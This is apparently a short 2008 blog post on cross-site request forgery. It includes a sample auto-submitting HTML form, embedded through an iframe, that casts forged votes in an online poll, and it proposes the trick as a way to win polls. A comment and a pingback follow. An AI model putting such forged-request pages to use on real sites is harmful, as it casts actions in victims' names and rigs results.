I love CSRF (XSRF)
I really do love CSRF?…. and it all started back when I was reading a topic on w4ck1ng forum, don’t remember the link but gonna tell you in small words. There was this guy who wanted to know if there could be a way to win a poll without constantly changing proxy. First thing that came to my mind was csrf. Why do the dirty job and manually vote 24/7 so that you can win; when you can create a html page with contains the form with auto-submit and incorporate it in a iframe on a website?
How does the html of such a poll look?
—
<html>
<body onload=”document.poll.submit()”>
<form name=”poll” action=”website.dom/pollvote.php” method=”post”>
<input type=”hidden” value=”3″> //the poll option
</form>
</body>
</html>
—
This is just an example, for more csrf fun check the CSRF Database
I was wondering if you would
like to do a presentation
on either CSRF or a topic
of your choice at the upcomming
online darkstar presentation.
drop me an email or something.
peace,
fazed
[...] 7, 2008 Some time ago when I posted I Love CSRF (XSRF) fazed invited me to do a presentation on CSRF attack and protection… but since then [...]